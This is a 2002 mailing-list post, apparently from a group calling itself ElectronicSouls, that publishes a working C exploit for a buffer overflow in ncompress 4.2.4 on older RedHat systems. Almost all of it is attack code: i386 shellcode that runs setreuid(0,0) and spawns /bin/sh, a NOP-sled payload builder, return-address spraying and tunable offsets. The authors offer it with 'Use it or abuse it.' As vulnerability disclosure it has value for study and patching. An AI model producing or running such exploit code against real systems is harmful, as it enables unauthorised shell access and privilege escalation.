Message-ID: <200211290713.gAT7DINB054556@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - /usr/bin/compress exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is proof-of-concept code demonstrating a vulnerability in
/usr/bin/compress.  Use it or abuse it.

/*
 * PROOF OF CONCEPT
 * Information System Advancement in Penetration (ISAP) Labs
 *
 * (N)compress 4.2.4 Exploit
 * By: Lunar Fault [ElectronicSouls]
 *
 * Vulnerable systems found: RedHat 6.2, 7.0, 7.1, and 7.2
 *
 * Description:  Simple unchecked buffer overflow involving strcat.  This
 * exploit was tested on RedHat 6.2, 7.0, and 7.1.  This is only a
 * proof of concept.  /usr/bin/compress is not suid root by default, so
 * on a stock install it does not escalate privilege.
 *
 * April 22, 2002
 */

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULN "/usr/bin/compress"   /* target binary; the payload is passed as its first argument */
#define NOP 0x90909090             /* four x86 one-byte NOPs (0x90) packed into one 32-bit word */
#define NOPLEN 500                 /* bytes of NOP sled placed before the shellcode */

/* Thanx to 0x90 for the shellcode :) */
/*
 * i386 Linux shellcode: setreuid(0, 0) via int 0x80 (eax = 0x46, ebx = ecx = 0),
 * then execve("/bin/sh", ["/bin/sh"], NULL) via int 0x80 (eax = 0x0b).  The
 * jmp/call pair locates the trailing "/bin/sh" string, and the code writes the
 * NUL terminator and the argv/envp pointers into its own bytes at runtime, so
 * it only works on a writable, executable stack (no NX/W^X).  There is no
 * exit() after execve, so a failed execve runs into the string bytes.
 * It contains no NUL byte, which is why strlen() on it yields its full length.
 */
const unsigned char linux_x86_exec_hellcode[] =
"\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29"
"\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

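/*
 * Return the current stack pointer, used as the base for guessing where
 * compress's stack frame (and so our NOP sled) will land.
 *
 * The original relied on leaving %esp in %eax and falling off the end of
 * a non-void function, which is undefined behaviour and i386-only.  This
 * version hands the register to C through an asm output operand, so the
 * compiler knows the value is the return value; on non-x86 targets the
 * frame address is the closest portable approximation.
 */
unsigned long get_sp(void)
{
   unsigned long sp;
#if defined(__i386__)
   __asm__ volatile ("mov %%esp, %0" : "=r" (sp));
#elif defined(__x86_64__)
   __asm__ volatile ("mov %%rsp, %0" : "=r" (sp));
#else
   sp = (unsigned long) __builtin_frame_address(0);
#endif
   return sp;
}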

/*
 * Print the banner and the option summary for program name `prog`, then
 * terminate with exit status 1.  Never returns.
 */
void usage(char *prog)
{
   static const char *const banner[] = {
      "<+> (N)compress 4.2.4 Exploit",
      "<+> By: Lunar Fault [ElectronicSouls]",
      "<+> Information System Advancement in Penetration (ISAP) Labs",
   };
   size_t line;

   for (line = 0; line < sizeof banner / sizeof banner[0]; line++)
      puts(banner[line]);

   printf("<!> usage: %s [options]\n", prog);
   fputs("\t\t-h  help\n"
         "\t\t-o <offset>     Example: 100\n"
         "\t\t-r <return>     Example: 0xbfffc680\n"
         "\t\t-s <size>       Example: 1056\n", stdout);
   exit(1);
}

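/*
 * Build the argument handed to compress: NOPLEN bytes of NOP sled, the
 * shellcode at offset NOPLEN, then the guessed return address repeated to
 * the end of the buffer.
 *
 * len  - number of payload bytes; the caller has already checked it holds
 *        the sled, the shellcode and some return-address words.
 * ret  - return address to spray over the tail of the buffer.
 *
 * Returns a heap buffer of `len` payload bytes plus a NUL terminator that
 * the caller frees, or NULL if malloc() fails.
 */
static char *build_payload(size_t len, unsigned long ret)
{
   const uint32_t nop = NOP;
   const uint32_t word = (uint32_t) ret;
   size_t i;

   /* One extra byte: execl() treats the buffer as a C string, so without a
    * terminator the callee would read past the allocation. */
   char *buffer = malloc(len + 1);
   if (buffer == NULL)
      return NULL;

   /* NOP sled over the whole buffer.  Copied as 32-bit words through
    * memcpy (no aliasing/alignment assumptions, and never more than `len`
    * bytes); any trailing partial word gets the low NOP byte. */
   for (i = 0; i + sizeof nop <= len; i += sizeof nop)
      memcpy(buffer + i, &nop, sizeof nop);
   for (; i < len; i++)
      buffer[i] = (char) (NOP & 0xff);

   /* Return-address words from NOPLEN to the end, 32 bits each in host
    * byte order (the exploit targets i386 only).  Trailing bytes that do
    * not fill a word stay NOP. */
   for (i = NOPLEN; i + sizeof word <= len; i += sizeof word)
      memcpy(buffer + i, &word, sizeof word);

   /* Shellcode overwrites the first words of the return-address spray. */
   memcpy(buffer + NOPLEN, linux_x86_exec_hellcode, strlen((const char *) linux_x86_exec_hellcode));

   buffer[len] = '\0';
   return buffer;
}

/*
 * Entry point.  Options:
 *   -r <return>  return address to spray (default: our own stack pointer
 *                minus 250, which landed in the sled on the tested systems)
 *   -o <offset>  signed offset added to the return address (default 0)
 *   -s <size>    size of the argument in bytes (default 1056)
 *   -h           usage
 * Prints the chosen values, then exec()s VULN with the payload as its only
 * argument.  Exits 1 on bad options, allocation failure or a failed execl().
 */
int main(int argc, char *argv[])
{
   int c;
   long offset = 0;
   long len = 1056;
   unsigned long ret = get_sp() - 250;  /* 250 below our sp: somewhere in the NOP sled */
   char *end;

   printf("<+> (N)compress 4.2.4 Exploit\n");
   printf("<+> By: Lunar Fault [ElectronicSouls]\n");
   printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");

   while ((c = getopt(argc, argv, "r:s:o:h")) != -1) {
      switch (c) {
         case 'r':
            /* strtoul, not strtoll-into-int: 0xbfffc680 must survive on a
             * 32-bit build, and garbage must be rejected rather than used. */
            errno = 0;
            ret = strtoul(optarg, &end, 0);
            if (end == optarg || *end != '\0' || errno == ERANGE) {
               printf("<!> Bad value for -r: %s\n", optarg);
               exit(1);
            }
            break;
         case 's':
            /* Reject non-numbers, negatives (which would pass an unsigned
             * compare) and anything too small for sled + shellcode + spray. */
            errno = 0;
            len = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || errno == ERANGE || len <= 0
                || (unsigned long) len < NOPLEN + strlen((const char *) linux_x86_exec_hellcode) + 100) {
               printf("<!> Size is too small to work\n");
               exit(1);
            }
            break;
         case 'o':
            errno = 0;
            offset = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || errno == ERANGE) {
               printf("<!> Bad value for -o: %s\n", optarg);
               exit(1);
            }
            break;
         case 'h':
         default:
            /* Unknown option or -h: usage() never returns. */
            usage(argv[0]);
      }
   }

   /* Unsigned wrap-around is the intended address arithmetic for a negative offset. */
   ret += (unsigned long) offset;

   char *buffer = build_payload((size_t) len, ret);
   if (buffer == NULL) {
      perror("malloc");
      return 1;
   }

   printf("<*> Offset = %ld\n", offset);
   printf("<*> Return = 0x%.8lx\n", ret);
   printf("<*> Size = %ld\n\n", len);
   /* A successful exec discards stdio buffers; flush so the values above
    * are visible even when stdout is a pipe or file. */
   fflush(stdout);

   /* The sentinel must be a null pointer, not int 0: on LP64 an int 0 is
    * only four bytes of the variadic slot execl() reads as a char *. */
   execl(VULN, VULN, buffer, (char *) NULL);

   /* Only reached if the exec failed. */
   perror(VULN);
   free(buffer);
   return 1;
}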

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"The end is now."


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX
0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ==
=ABKy
-----END PGP SIGNATURE-----




